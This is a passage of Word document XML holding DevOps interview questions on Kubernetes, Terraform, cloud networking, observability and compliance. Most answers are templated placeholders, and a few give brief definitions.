        <w:t>A: A strong answer should directly address the Kubernetes/Networking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CNI have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Do you have experience with a Service Mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Service Mesh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 you have experience with a Service Mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Can you explain what a Service Mesh is?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Service Mesh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Can you explain what a Service Mesh is?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is the difference between a Deployment and a StatefulSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Workloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Workloads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a Deployment and a StatefulSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do Liveness and Readiness probes differ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Probes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Probes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Liveness and Readiness probes differ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is a Sidecar container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Containers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Containers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a Sidecar container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Ingress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Ingress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an Ingress Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you handle Pod Autoscaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Autoscaling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Autoscaling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handle Pod Autoscaling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is a Kubernetes Secret?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Secrets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a Kubernetes Secret?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What is BusyBox?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Kubernetes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BusyBox?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What does etcd store?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/etcd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/etcd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does etcd store?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Does etcd store namespaces and storage configurations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/etcd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/etcd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Does etcd store namespaces and storage configurations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What is Blue-Green Deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Deployment Strategies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Blue-green deployment runs two environments: the current production version and the new version. Traffic is switched to the new environment after validation, and rollback is fast by switching traffic back.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Blue-green Deployment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Q15. What is the use of Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Helm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Helm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use of Helm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What is the difference between AWS VPC, Azure VNet, and GCP VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud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AWS VPC, Azure VNet, and GCP VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you connect on-premises resources with cloud resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Hybrid Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Hybrid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connect on-premises resources with cloud resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. What is a VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A VPC (Virtual Private Cloud) is an isolated, logically-defined private network within a cloud provider where you control IP ranges, subnets, routing, and connectivity for your resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How many Kubernetes clusters do you require in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Architecture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many Kubernetes clusters do you require in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How does a Load Balancer distribute traffic between services, for example 50-50?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Load Balancing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a Load Balancer distribute traffic between services, for example 50-50?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What is mTLS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/mTLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: mTLS, or mutual TLS, requires both client and server to present certificates. It provides encrypted communication plus strong service or user identity validation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Mtls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Q22. How much experience do you have with Prometheus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Prometheus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Prometheus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much experience do you have with Prometheus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How much experience do you have with Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Grafana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much experience do you have with Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How much experience do you have with OpenTelemetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/OpenTelemetry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much experience do you have with OpenTelemetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Have you worked with Jaeger?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Tracing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Tracing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with Jaeger?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. Have you integrated ELK?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Logging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integrated ELK?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. What is Terraform State?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/State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Terraform State?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Why is Terraform State a security risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Security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Why is Terraform State a security risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. How do you manage state locking in a team environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/State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manage state locking in a team environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. What is a Terraform Module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Terraform module is a reusable, self-contained group of resource definitions with input variables and outputs, called from other configurations to avoid duplicating the same infrastructure pattern repeatedly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. When should you use a Terraform Module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Modules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When should you use a Terraform Module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How do you handle secret injection in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Secrets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handle secret injection in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. What is idempotency in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Ansible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idempotency in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. Have you worked in environments with compliance requirements like PCI DSS, GDPR, or SOC 2?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Compliance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in environments with compliance requirements like PCI DSS, GDPR, or SOC 2?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. What was your role in meeting those compliance requirements?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Compliance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was your role in meeting those compliance requirements?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. Are all three of your cloud certifications still valid?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Certifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Certifications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Are all three of your cloud certifications still valid?</w:t>
